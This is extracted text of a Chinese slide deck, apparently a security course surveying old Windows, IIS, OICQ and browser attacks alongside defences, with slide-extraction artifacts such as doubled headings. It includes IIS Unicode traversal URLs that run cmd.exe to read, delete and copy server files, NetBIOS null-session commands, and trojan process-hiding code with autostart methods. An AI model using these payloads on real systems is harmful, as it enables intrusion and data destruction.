资源描述
12l漏洞描述:如果命名一个文件名字:file.html .exe 其中用ASCII的255来代替其中的空格,那么,在WINDOWS里面将只能看见文件名是:file.html。并且这个文件名欺骗对IE的下载对话框同样存在,恶意者可能连接一个可执行文件,但是让人看起来象一个HTML网页3lWindows快捷方式包括扩展名为lnk、pif、url的文件。其中url文件为纯文本格式lnk和pif文件为二进制文件。这三种快捷方式都可以自定义图标文件,当把图标文件名设定为Windows的默认设备名时,由于设备名称解析漏洞,可导致Windows 95/98系统崩溃。由于对图标的搜索是由Explorer自动完成的,所以只要快捷方式在资源浏览器中出现,就会导致系统崩溃。如果快捷方式在桌面上,那么系统一启动就会崩溃。只有以DOS启动系统,在命令行下删除。由于无法直接设置图标文件名为设备名,只有通过直接编辑的方式来创建。4l对于Windows NT/2000系统不会由于设备名称解析而崩溃。但当我们创建一个完全由ASCII字符填充组成的pif文件时会出现以下情况:1)一个非法的pif文件(用ascii字符x填充)至少要369字节,系统才认为是一个合法的pif文件,才会以pif的图标pifmgr.dll,0显示,在属性里有程序、字体、内存、屏幕”等内容。而且仅仅当一个非pif文件的大小是369字节时察看属性的“程序”页时,不会发生程序错误,哪怕是370字节也不行。当对一个大于369字节的非法pif文件察看属性的“程序”页时,Explorer会出错,提示:5l0 x77650b82指令引用的0 x000000000内存。该内存不能为read但这种错误并不会引起缓冲溢出的安全问题。初步分析了一下,问题出在pif文件的16进制地址:0 x000001810 x870 x000001820 x01和0 x000002310 xC30 x000002320 x02即使是一个合法pif文件,只要改动这四处的任意一处,也会引起程序错误。而只要把0 x00000181和0 x00000182的值改为0 xFF0 xFF,那么其它地址任意更改都不会引起错误。6l2)当一个大于30857的非法pif文件(用ascii字符x填充)出现在资源管理器中时,会使系统的CPU资源占用达100%,根本不能察看其属性页。也无法在资源管理器中对其进行任何操作,甚至不能在命令提示符中删除。试图删除时会提示会提示:“进程无法访问文件,因为另一个程序正在使用此文件。”但只要把0 x00000181和0 x00000182中任意一处改为0 xFF这种情况就不会发生。这是由于资源浏览器试图显示其实并不存在的图标引起的。如果快捷方式在桌面上,那么系统一启动这种情况就会出现。只有使用任务管理器中止Explorer.exe的进程,再启动一个命令提示符,从命令行下删除。此问题仅影响Windows NT/2000系统,不影响Windows 95/98。7lNetBIOS的信息泄漏的信息泄漏net use serverIPC$/user:/此命令用来建立一个空会话net view server /此命令用来查看远程服务器的共享资源服务器名称注释-pc1pc2命令成功完成。net time server /此命令用来得到一个远程服务器的当前时间。8nbtstat-A server /此命令用来得到远程服务器的NetBIOS用户名字表NetBIOS Remote Machine Name Table Name Type Status-NULL UNIQUE RegisteredNULL UNIQUE RegisteredINTERNET GROUP RegisteredXIXI UNIQUE RegisteredINetServices GROUP RegisteredISNULL.UNIQUE RegisteredINTERNET GROUP RegisteredADMINISTATOR UNIQUE RegisteredINTERNET UNIQUE Registered._MSBROWSE_.GROUP RegisteredMAC Address=00-54-4F-34-D8-809l修改注册表一劳永逸HKEY-LOCAL_MACHINESYSTEMCurrentControSetControlLSAValue Name:RestrictAnonymousData Type:REG_DWORDValue:11011windows98和2000中,一个名为Folder.htt的文件决定了文件夹以何种方式显示为web页面。这个文件包含活动的脚本解释执行。如果一个用户任意打开了一个文件夹,同时以web页面形式察看该文件夹的选项为enable的话(默认选项),则Folder.htt文件中的任何代码均会以该用户的特权等级运行。通过本地文件夹和远程UNC共享都可以利用此漏洞。问题出在ShellDefView ActiveX控件。这个控件用来确定对选中的文件执行什么操作。为了激活对选中的文件的默认操作,它使用无任何参数的InvokeVerb()方法。文件夹中的第一个文件可以通过FileList.focus()方法被自动选中。因此,如果创建一个文件,它默认的打开操作为“执行”,而且处于文件列表的第一个位置(默认的文件排序方式是按字母顺序,例11111111.bat会因此被排在首位),则只要打开该文件所在的文件夹,就会选中并运行该文件。12lUNICODE漏洞的原理漏洞的原理l此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。中文版的WIN2000中,UNICODE编码 存在BUG,在UNICODE 编码中%c1%1c-(0 xc1-0 xc0)*0 x40+0 x1c=0 x5c=/%c0%2f-(0 xc0-0 xc0)*0 x40+0 x2f=0 x2f=NT4中/编码为%c1%9c 在英文版里:WIN2000英文版%c0%af 但从国外某些站点得来的资料显示,还有以下的编码可以实现对该漏洞的检测.%c1%pc%c0%9v%c0%qf%c1%8s%e0%80%af%f0%80%80%af%fc%80%80%80%80%af 13lUNICODE编码漏洞简单利用的命令编码漏洞简单利用的命令 l1、显示文件内容、显示文件内容 如果想显示里面的其中一个badboy.txt文本文件,我们可以这样输入(htm,html,asp,bat等文件都是一样的)http:/x.x.x.x/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+type+c:badboy.txt 那么该文件的内容就可以通过IE显示出来。2、建立文件夹的命令、建立文件夹的命令 http:/x.x.x.x/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+md+c:badboy运行后我们可以看到返回这样的结果:CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers.The headers it did return are:14l3、删除空的文件夹命令、删除空的文件夹命令http:/x.x.x.x/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+rd+c:badboy返回信息同上 4、删除文件的命令、删除文件的命令http:/x.x.x.x/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+del+c:badboy.txt返回信息同上 5、copy文件且改名的命令文件且改名的命令http:/x.x.x.x/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+copy+c:badboy.txt bad.txt返回信息:CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers.The headers it did return are:1 file(s)copied.15l显示目标主机当前的环境变量显示目标主机当前的环境变量 http:/127.0.0.1/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+set 返回的信息:CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers.The headers it did return are:ALLUSERSPROFILE=E:Documents and SettingsAll Users AUTH_TYPE=Negotiate AUTH_USER=BADBOYCL-DQQZQQbadboy CASL_BASEDIR_ENV=E:scanCyberCop Scannercasl CommonProgramFiles=E:Program FilesCommon Files COMPUTERNAME=BADBOYCL-DQQZQQ ComSpec=E:WINNTsystem32cmd.exe 16lCONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=*/*HTTP_ACCEPT_LANGUAGE=zh-cn HTTP_CONNECTION=Keep-Alive HTTP_HOST=127.0.0.1 HTTP_USER_AGENT=Mozilla/4.0(compatible;MSIE 5.01;Windows NT 5.0)HTTP_AUTHORIZATION=Negotiate TlRMTVNTUAADAAAAGAAYAIgAAAAYABgAoAAAAB4AHgBAAAAADAAMAF4AAAAeAB4AagAAAAAAAAC4AAAABYKAgEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAGIAYQBkAGIAbwB5AEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAODLOAUsBqOAQ3/+AfwqHKj8Q2vzSAGGgkD6hCEY0EoOIKZVHMr4lmc1Ju37n7SleT=HTTP_ACCEPT_ENCODING=gzip,deflate HTTPS=off INSTANCE_I 171819 drwtsn32.exe(Dr.Watson)是一个Windows系统内置的程序错误调试器。默认状态下,出现程序错误时,Dr.Watson 将自动启动,除非系统上安装了VC等其他具有调试功能的软件更改了默认值。注册表项:HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionAeDebug下的Debugger 项的值指定了调试器及使用的命令;Auto 项决定是否自动诊断错误,并记录相应的诊断信息。HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionAeDebug20 在Windows 2000中drwtsn32.exe默认会将故障转储文件user.dmp存放在目录“Documents and SettingsAll UsersDocumentsDrWatson”下。权限为Everyone完全控制。在Windows NT中被存储在“WINNT”中,everyone组至少有读取权限。由于user.dmp中存储的内容是当前用户的部分内存镜像,所以可能导致各种敏感信息泄漏,例如帐号、口令、邮件、浏览过的网页、正在编辑的文件等等,具体取决于崩溃的应用程序和在此之前用户进行了那些操作。21ldrwtsn32 参数drwtsn32-i-g-p pid-e event-?-i 将 DrWtsn32 当作默认应用程序错误调试程序-g 被忽略,但作为 WINDBG 和 NTSD 的兼容而被提供-p pid 要调试的进程 id-e event 表示进程附加完成的事件-?这个屏幕 22l木马的分类 木马程序技术发展至今,已经经历了4代,第一代,即是简单的密码窃取,发送等,没有什么特别之处。第二代木马,在技术上有了很大的进步,冰河可以说为是国内木马的典型代表之一。第三代木马在数据传递技术上,又做了不小的改进,出现了ICMP等类型的木马,利用畸形报文传递数据,增加了查杀的难度。第四代木马在进程隐藏方面,做了大的改动,采用了内核插入式的嵌入方式,利用远程插入线程技术,嵌入DLL线程。或者挂接PSAPI,实现木马程序的隐藏,甚至在Windows NT/2000下,都达到了良好的隐藏效果。相信,第五代木马很快也会被编制出来。23l木马程序的隐藏技术木马程序的隐藏技术l进程进程:一个正常的Windows应用程序,在运行之后,都会在系统之中产生一个进程,同时,每个进程,分别对应了一个不同的PID(Progress ID,进程标识符)这个进程会被系统分配一个虚拟的内存空间地址段,一切相关的程序操作,都会在这个虚拟的空间中进行。线程线程:一个进程,可以存在一个或多个线程,线程之间同步执行多种操作,一般地,线程之间是相互独立的,当一个线程发生错误的时候,并不一定会导致整个进程的崩溃。服务服务:一个进程当以服务的方式工作的时候,它将会在后台工作,不会出现在任务列表中,但是,在Windows NT/2000下,你仍然可以通过服务管理器检查任何的服务程序是否被启动运行。24lWINAPI WinMain(HINSTANCE,HINSTANCE,LPSTR,int)try DWORD dwVersion=GetVersion();/取得Windows的版本号 if(dwVersion=0 x80000000)/Windows 9x隐藏任务列表 int(CALLBACK*rsp)(DWORD,DWORD);HINSTANCE dll=LoadLibrary(KERNEL32.DLL);/装入KERNEL32.DLL rsp=(int(CALLBACK*)(DWORD,DWORD)GetProcAddress(dll,RegisterServiceProcess);/找到RegisterServiceProcess的入口 rsp(NULL,1);/注册服务 FreeLibrary(dll);/释放DLL模块 catch(Exception&exception)/处理异常事件 /处理异常事件 return 0;25l程序的自加载运行技术程序的自加载运行技术1 1、集成到程序中、集成到程序中 6 6、在、在System.iniSystem.ini中藏身中藏身2 2、隐藏在配置文件中、隐藏在配置文件中 7 7、隐形于启动组中、隐形于启动组中3 3、潜伏在、潜伏在Win.iniWin.ini中中 8 8、隐蔽在、隐蔽在Winstart.batWinstart.bat中中4 4、伪装在普通文件中、伪装在普通文件中 9 9、捆绑在启动文件中、捆绑在启动文件中5 5、内置到注册表中、内置到注册表中 10 10、设置在超级连接中、设置在超级连接中 26l木马程序的建立连接的隐藏木马程序的建立连接的隐藏 合并端口法,也就是说,使用特殊的手段,在一个端口上同时绑定两个TCP或者UDP连接,这听起来不可思议,但事实上确实如此,而且已经出现了使用类似方法的程序,通过把自己的木马端口绑定于特定的服务端口之上,(比如80端口的HTTP,谁怀疑他会是木马程序呢?)从而达到隐藏端口的目地。另外一种办法,是使用ICMP(Internet Control Message Protocol)协议进行数据的发送,原理是修改ICMP头的构造,加入木马的控制字段,这样的木马,具备很多新的特点,不占用端口的特点,使用户难以发觉,同时,使用ICMP可以穿透一些防火墙,从而增加了防范的难度。之所以具有这种特点,是因为ICMP不同于TCP,UDP,ICMP工作于网络的应用层不使用TCP协议。27木马程序的建立连接的隐藏木马程序的建立连接的隐藏2829l1.MIME简介简介MIME(Multipurpose Internet Mail Extentions),一般译作“多用途的网际邮件扩充协议”。顾名思义,它可以传送多媒体文件,在一封电子邮件中附加各种格式文件一起送出。现在它已经演化成一种指定文件类型(Internet的任何形式的消息:e-mail,usenet新闻和Web)的通用方法。在使用CGI程序时你可能接触过MIME类型,其中有一行叫作Content-type的语句,它用来指明传递的就是MIME类型的文件(如text/html或text/plain)。30 IE是如何处理附件的:一般情况下如果附件是文本文件,IE会读它,如果是VIDEO CLIP,IE会查看它;如果附件是图形文件,IE就会显示它;如果附件是一个EXE文件呢?IE会提示用户是否执行!但令人恐惧的是,当攻击者更改MIME类型后,IE就不再提示用户是否执行而直接运行该附件!从而使攻击者加在附件中的程序、攻击命令能够按照攻击者设想的情况进行。31l纵观针对OICQ的攻击,主要分为IP探测、消息炸弹、密码和本地消息破解、木马植入及其它方式。推出该安全手册的目的是为了能让大多数对网络安全不熟悉的网民们能够简单的防御这些攻击。32lIP探测探测 由于OICQ采用的是UDP数据包通讯,攻击者只要向你发送一个信息,他就可以通过监视UDP数据包来获得你的IP和OICQ的端口号,从理论上说,在直接通讯的模式下,想避免攻击者发现你的IP地址是十分困难。IP探测的另一个方法是通过端口扫描,OICQ的通讯端口值默认情况下是8000,攻击者可以通过集中扫描某一地址段的8000端口来获得那些正在使用OICQ的IP地址。33l防范IP探测的主要方法是:一、阻止攻击者与你直接通讯,在OICQ的个人设定里修改身份验证默认值为需要身份认证才能把我加为好友,这样攻击者也还是可以通过某些特殊的信息发送软件跟你通讯,所以你还应该在系统参数设置里把拒绝陌生人消息的选项选上。另一种阻止攻击者与你直接通讯的方法是通过代理上OICQ或者隐身登陆,这样攻击者所看到的IP地址是代理服务巧删OICQ登录号码器的IP,隐身登陆的消息传递是通过服务器中转,这样传给攻击者的数据包的IP地址是腾讯服务器的地址。修改OICQ通讯端口默认值是避免被攻击者扫描的唯一方法,它还能防止攻击者给你发送垃圾消息。34l消息炸弹消息炸弹 消息炸弹攻击原理是利用UDP数据通讯不需要验证确认的弱点,只要拿到用户的IP地址和OICQ通讯端口即可发动攻击。35l密码和本地消息破解密码和本地消息破解 通过暴力解密是一种破解手段,有些攻击者还采用一些键盘记录程式来记录你输入的帐号和密码,让你防不胜防。另一种获得OICQ密码的手段是通过攻击你的注册邮箱,由于腾讯有一个忘记密码功能,它将用户的OICQ密码发送到用户注册时的邮箱里,攻击者一旦拿到这个邮箱,即可以很简单的拿到你的密码。36l一、本地破解防范一、本地破解防范 破解密码通常是穷举。不要用简单的英文和纯数字作为密码,应该是大小写、数字、符号的混合,不要少于八位,这样的话密码就不容易被破了l二、攻击注册邮箱防范二、攻击注册邮箱防范 个人资料里和你申请号码时所填的mail地址不要一样,除非你对你的密码很有信心。选择一个好密码也是一个好办法!37l剖析剖析GOP木马程序木马程序lGOP木马的检查木马的检查 该木马运行的时候在Windows的任务窗口中是看不到的,你可以点任务条上的“开始”、“运行”、“msinfo32”(就是Windows自带的系统信息,在“附件”中)。看其中的软件环境正在运行的任务。这才是Windows现在全部运行的任务。当你在运行了什么东西之后觉得有问题的时候就看看这里。如果有一个项目有程序名和路径,而没有版本、厂商和说明,你就应该紧张一下了。GOP木马在这里显示的版本为:“不能用”。如果你发现GOP木马,先关掉你的猫(断网),然后脱机重新登录一次你的OICQ,查找电脑中是否有record.dat文件(每个盘都应该查一下!绝不放过!)(这是GOP记录OICQ密码的文档,如果你的OICQ密码被监控到了就一定会有。当然,即使你中了木马,在你还没有用OICQ的时候是不会有这个文件的。反正现在不在网上,不用担心密码被发走)。如果有的话,那么“恭喜”你了,100%中了木马。不信?用记事本打开那个record.dat,看看有没有你的宝贝OICQ的号码和密码。你还可以运行系统配置实用程序(开始运行msconfig),在启动栏里,你亦可发现“WindowsAgent”(就是上文提到的“定义注册表键名”,可能会是其它键名)38lGOP木马的清除木马的清除 在注册表的HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun主键下添加一个键值来让木马自动运行,该木马也不例外。运行regedit,进入HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun主键,记住那个在系统信息中查到的那个文件,也可在msconfig启动名称里找到(在“剖析木马的设置”中,我们知道木马文件名是可以任意定制的,所以无法确定具体的文件名)的存放路径,删除该键值。然后关闭计算机,稍候一下启动计算机(注意:不要选重新启动)。然后进入文件的存放路径删除木马文件即可。39l邮件炸弹原理邮件炸弹原理 E-MAIL炸弹原本泛指一切破坏电子邮箱的办法,一般的电子邮箱的容量在5,6M以下,平时大家收发邮件,传送软件都会觉得容量不够,如果电子邮箱一下子被几百,几千甚至上万封电子邮件所占据,这是电子邮件的总容量就会超过电子邮箱的总容量,以至造成邮箱超负荷而崩溃。【kaboom3】【upyours4】【Avalanche v2.8】40l邮件炸弹防范邮件炸弹防范 不要将自己的邮箱地址到处传播,特别是申请上网帐号时ISP送的电子信箱,那可是要按字节收费的哟!去申请几个免费信箱对外使用,随便别人怎么炸,大不了不要了。最好用POP3收信,你可以用Outlook 或Foxmail等POP收信工具收取Email。例如用Outlook,你可以选择“工具”/“收件箱助理”,然后点击“添加”在属性窗口可以设定对各种条件的Email的处理方式。41l邮件炸弹防范邮件炸弹防范当某人不停炸你信箱时,你可以先打开一封信,看清对方地址,然后在收件工具的过滤器中选择不再接收这地址的信,直接从服务器删除。4。在收信时,一旦看见邮件列表的数量超过平时正常邮件的数量的若干倍,应当马上停止下载邮件,然后再从服务器删除炸弹邮件。不要认为邮件发送有个回复功能,就可以将发炸弹的人报复回来,那是十分愚蠢的!发件人有可能是用的假地址发信,这个地址也许填得与收件人地址相同。这样你不但不能回报对方,还会使自己的邮箱彻底完结!42l邮件炸弹防范邮件炸弹防范你还可以用一些工具软件防止邮件炸弹,下面本站就提供一个供大家下载:【echom201】这是一个功能强大的砍信机,每分钟能砍到1000封电子邮件,是对付邮件炸弹的好东西 43l端口攻击原理端口攻击原理 这类软件是利用Window95/NT系统本身的漏洞,这与Windows下微软网络协议NetBIOS的一个例外处理程序OOB(Out of Band)有关。只要对方以OOB的方式,就可以通过TCP/IP传递一个小小的封包到某个IP地址的Port139上,该地址的电脑系统即(WINDOWS95/NT)就会“应封包而死”,自动重新开机,你未存档的所有工作就得重新再做一遍了。44l端口攻击防范端口攻击防范 常见的端口攻击器有【uKe23】【voob】【WINNUKE2】。如果你还是用的win95,那您就要当心了。防 范 将你的Windows95马上升级到Windows98,首先修正Win95的BUG,在微软主页的附件中有对于Win95和OSR2以前的版本的补丁程序,Win98不需要。然后学会隐藏自己的IP,包括将ICQ中IP隐藏打开,注意避免在会显示IP的BBS和聊天室上暴露真实身份,特别在去黑客站点访问时最好先运行隐藏IP的程序。45lJAVA JAVA 炸弹原理炸弹原理 很多人在聊天室中被炸了以后,就以为是被别人黑了,其实不是的。炸弹有很多种,有的是造成电脑直接死机,有的是通过HTML语言,让你的浏览器吃完你的系统资源,然后你就死机了。46lJAVA JAVA 炸弹防范炸弹防范 唯一的防范方法就是你在聊天室聊天唯一的防范方法就是你在聊天室聊天时,特别是支持时,特别是支持HTMLHTML的聊天室(比如湛的聊天室(比如湛江,新疆等)请你一定记住关掉你浏览江,新疆等)请你一定记住关掉你浏览器里的器里的javajava功能,还要记住不要浏览一功能,还要记住不要浏览一些来路不明的网站和不要在聊天室里按些来路不明的网站和不要在聊天室里按其他网友发出的超级链接,这样可以避其他网友发出的超级链接,这样可以避免遭到恶作剧者的攻击免遭到恶作剧者的攻击.47l浏览主页硬盘共享浏览主页硬盘共享 “万花谷”,如果进入该网页浏览者注册表会被修改,好多系统功能因此受到限制。最近又听说有网友在浏览网页时硬盘被共享,危害似乎更大!其实,所谓的浏览网页硬盘被共享,和“万花谷”一样,受害者都是在浏览了含有有害代码的ActiveX网页文件后中招的。48l浏览主页硬盘共享浏览主页硬盘共享防御防范:1、不要轻易去一些自己并不了解的站点,特别是那些看上去美丽诱人的网址更不要贸然前往,否则吃亏的往往是你。2、运行IE,点击“工具Internet选项安全Internet区域的安全级别,把安全极别由“中”改为“高”3、由于该类网页是含有有害代码的ActiveX网页文件,因此在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可以避免中招。具体方法是:在IE窗口中点击“工具Internet选项,在弹出的对话框中选择“安全”标签,再点击“自定义级别”按钮,就会弹出“安全设置”对话框,把其中所有ActiveX插件和控件以及Java相关全部选择“禁用”即可。不过,这样做在以后的网页浏览过程中可能会造成一些正常使用ActiveX的网站无法浏览。唉,有利就有弊,你还是自己看着办吧。4、对于Windows98用户,请打开C:WINDOWSJAVAPackagesCVLV1NBB.ZIP,把其中的“ActiveXComponent.class”删掉;对于WindowsMe用户,请打开C:WINDOWSJAVAPackages5NZVFPF1.ZIP,把其中的“ActiveXComponent.class”删掉。请放心,删除这个组件不会影响到你正常浏览网页的。495、既然这类网页是通过修改注册表来破坏我们的系统,那么我们可以事先把注册表加锁:禁止修改注册表,这样就可以达到预防的目的。不过,自己要使用注册表编辑器regedit.exe该怎么办呢?因此我们还要在此前事先准备一把“钥匙”,以便打开这把“锁”!加锁方法如下:(1)运行注册表编辑器regedit.exe;(2)展开注册表到HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem下,新建一个名为DisableRegistryTools的DWORD值,并将其值改为“1”,即可禁止使用注册表编辑器regedit.exe。解锁方法如下:用记事本编辑一个任意名字的.reg文件,比如unlock.reg,内容如下:REGEDIT4 HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem DisableRegistryTools=dword:00000000 5051l网页执行网页执行exe文件文件在服务器端执行文件是靠SSI来实现的,SSI是服务器端包含的意思(不是SSL),我们经常使用的#include 就是服务器端包含的指令之一。不过,这次要介绍的就是-#exec。就是他可以实现服务器端执行指令。不过,不能用于.asp的文件。而只能stm、.shtm 和.shtml这些扩展名。而能解释执行他们的就是Ssinc.dll。所以,你写好的代码必须保存成.stm等格式才能确保服务器能执行。52l网页执行网页执行exe文件文件SSI有什么用?目前,主要有以下几种用用途:1、显示服务器端环境变量2、将文本内容直接插入到文档中3、显示WEB文档相关信息(如文件制作日期/大小等)4、直接执行服务器上的各种程序(如CGI或其他可执行程序)5、设置SSI信息显示格式(如文件制作日期/大小显示方式)高级SSI可设置变量使用if条件语句。53l将会显示密码文件l将会显示当前目录下文件列表l将会执行CGI程序gb.cgi。l将会执行CGI程序access_log.cgi54l防范方法access.conf中的”Options Includes ExecCGI”这行代码删除;在IIS中,要禁用#exec 命令,可修改 SSIExecDisable 元数据库;55l注册表的介绍l注册表的修改56l所谓注册表就是一个庞大的数据库,其中容纳了应用程序和计算机系统的全部配置信息,Windows 9x系统和应用程序的初始化信息,应用程序和文档文件的关联关系,硬件设备的说明,状态和属性以及各种状态信息和数据。他有两个部分组成:注册表数据库(包括两个文件:SYSTEM.DAT和USER.DAT)和注册表编辑器。SYSTEM.DAT是用来保存微机的系统信息,如安装的硬件和设备驱动程序的有关信息USER.DAT是用来保持每个用户特有的信息,如桌面设置,墙纸和窗口颜色设置等。他们的自备份文件为SYSTEM.DAO和。注册表编辑器则是来对注册表进行各种编辑工作。57系统对注册表预定了六个主管键字:HKEY_CLASSES_ROOT:文件扩展名与应用的关联及OLE信息 HKEY_USERS:用户根据个人爱好设置的信息。HKEY_CURRENT_USER:当前登录用户控制面板选项和桌面等的设置,以及映射的网络驱动器 HKEY_LOCAL_MACHINE:计算机硬件与应用程序信息 HKEY_DYN_DATA:即插即用和系统性能的动态信息 HKEY_CURRENT_CONFIG:计算机硬件配置信息 58注册表中的键值项数据注册表中的键值项数据注册表通过键和子键来管理各种信息。但是注册表中的所有信息都是以各种形式的键值项数据保存的。在注册表编辑器右窗格中显示的都是键值项数据。这些键值项数据可以分为三种类型:1.1.字符串值字符串值在注册表中,字符串值一般用来表示文件的描述和硬件的标识。通常由字母和数字组成,也可以是汉字,最大长度不能超过255个字符。在本例中以a=*表示。592.2.二进制值二进制值在注册表中二进制值是没有长度限制的,可以是任意字节长。在注册表编辑器中,二进制以十六进制的方式表示。在本站中以a=hex:01,00,00,00方式表示。3.DWORD3.DWORD值值DWORD值是一个32位(4个字节)的数值。在注册表编辑器中也是以十六进制的方式表示。在本站中以a=dword:00000001表示。60l在注册表中经常出现双重入口(分支),例如,有一些在HKEY_CLASSES_ROOT中的键同样会在HKEY_LOCAL_MACHINE中出现。注册表中经常出现双重入口(分支),例如,有一些在HKEY_CLASSES_ROOT中的键同样会在HKEY_LOCAL_MACHINE中出现。如果这些相同的分支出现在两个不同的根键中,那么,哪个根键有效呢?注册表的子键都有严格的组织。某些相同的信息会出现在超过一个的子键中,如果您只修改了一个子键,那么该修改是否作用于系统依赖于该子键的等级。一般来说,系统信息优先于用户等级。例如,一个设置项同时出现在HKEY_LOCAL_MACHINE和HKEY_USER子键中,通常由HKEY_LOCAL_MACHINE中的数据起作用。要注意的是,这种情况只发生在您直接编辑注册表时。如果您从“控制面板”中更改系统配置,则所有出现该设置项的地方均会发生相应的改变。61l 一、直一、直 接接 修修 改改 注注 册册 表表 的的 基基 本本 方方 法法 对 于 熟 悉 注 册 表 项 设 置 的 高 级 用 户,如 果 使 用 控 制 面 板 和 策 略 文 件 不 能 达 到 目 的,也 就 只 能 采 用 这 种 最 直 接、最 全 面 的 处 理 方 法。具 体 使 用 方 法 是 的Regedit.exe(注 册 表 编 辑 器)到 本 地 硬 盘 上 运 行,去 掉 注 册 表 只 读 方 式,对 系 统 注 册 表 项 进 行 修 改,完 成 后 应 存 盘 退 出。下 次 系 统 启 动 时,新 设 置 就 会 生 效。62二、二、间间 接接 修修 改改 注注 册册 表表 的的 简简 易易 方方 法法 在 注 册 表 文 本 文 件 的 首 行 必 须 用 命 令 字 符 串“REGEDIT”,其 作 用 是 通 知 系 统 调 用regedit 来 完 成 注 册 信 息 的 合 并 工 作。接 下 来 的 每 一 行 或 代 表 一 个 键 值 的 声 明 或 者 为 注 释 性 的 说 明 信 息。-主 键 及 其 默 认 键 值 的 声 明 格 式 为:-根 键 一 级 主 键 二 级 主 键.=默 认 键 值 63l 三、三、备备 份份 注注 册册 表表 的的 方方 法法 不 少 安 装 程 序(或 你 自 己 直 接 处 理)都 可 能 搞 乱 你 系 统 的 注 册 表,从 而 引 发 不 测,所 以 我 们 应 该 定 期 地 备 份 user.dat 和 system.dat 文 件。但 目 前 的 资 源 管 理 器(或 者 是DOS 来)都 不 能 直 接 复 制 这 两 个 文 件.64l1、让用户名不出现在登录框中、让用户名不出现在登录框中 Win9x以上的操作系统可以对以前用户登录的信息具有记忆功能,下次重新启动计算机时,我们会在用户名栏中发现上次用户的登录名,这个信息可能会被一些非法分子利用,而给用户造成威胁,为此我们有必要隐藏上机用户登录的名字。设置时,请用鼠标依次访问键值HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWinlogon,并在右边的窗口中新建字符串DontDisplayLastUserName,并把该值设置为1,设置完后,重新启动计算机就可以隐藏上机用户登录的名字。65l2、抵御、抵御BackDoor的破坏的破坏 目前,网上有许多流行的黑客程序,它们可以对整个计算机系统造成了极大的安全威胁,其中有一个名叫BackDoor的后门程序,专门拣系统的漏洞进行攻击。为防止这种程序对系统造成破坏,我们有必要通过相应的设置来预防BackDoor对系统的破坏。设置时,在编辑器操作窗口中用鼠标依次单击键值HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun,如果在右边窗口中如发现了“Notepad”键值,就将它删除,这样就能达到预防的目的了。66l3、不允许使用、不允许使用“控制面板控制面板”控制面板是Windows系统的控制中心,可以对设备属性,文件系统,安全口令等很多系统很关键的东西进行修改,我们当然需要防范这些了。在隐藏和禁止使用“控制面板”时,我们可以在开始菜单中的运行栏中输入regedit命令,打开注册表编辑器操作界面,然后在该界面中,依次用鼠标单击HKEY_CURRENT_USERSoftwareMicrosoft WindowsCurrentVersionPoliciesSystem键值,并在其中新建DWORD值NoDispCPL,把值修改为1(十六进制)就行了。67l4、拒绝通过网络访问软盘、拒绝通过网络访问软盘 为了防止病毒入侵整个网络,导致整个网络处于瘫痪状态,所以我们必须严格管理计算机的输入设备,以断绝病毒的源头,为此就要禁止通过网络访问软盘。设置时,首先单击开始按钮,从弹出的菜单中选择运行命令;随后,程序将弹出一个运行对话框,在该对话框中输入regedit命令,然后在打开的注册表编辑器中依次打开键值HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon,在右边的窗口中看看有没有键值AllocateFloppies,如果没有请创建DWORD值,名字取为AllocateFloppies,把它的值修改为或,其中0代表可被域内所有管理员访问,1代表仅可被当地登陆者访问。68l5、让、让“文件系统文件系统”菜单在系统属性中消失菜单在系统属性中消失为了防止非法用户随意篡改系统中的文件,我们有必要把“系统属性”中“文件系统”的菜单隐藏起来。隐藏时,只要在注册表编辑器中用鼠标依次打开HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem键值,在右边的窗口中新建一个DWORD串值:“NoFileSysPage”,然后把它的值改为“1”即可。69l6、锁定桌面、锁定桌面桌面设置包括壁纸、图标以及快捷方式,它们的设置一般都是我们经过精心选择才设定好的。大多数情况下,我们不希望他人随意修改桌面设置或随意删除快捷方式。怎么办?其实修改注册表可以帮我们锁定桌面,这里“锁定”的含义是对他人的修改不做储存,不管别人怎么改,只要重新启动计算机,我们的设置就会原封不动地出现在眼前。设置时,运行regedit进入注册表编辑器,找到如下分支:HkeyUsersSoftwareMicrosoftWindowsCurentVersionPolioiesExplores,并用鼠标双击“No Save Setting”,并将其键值从0改为1就OK了!70l7、禁用、禁用Regedit命令命令 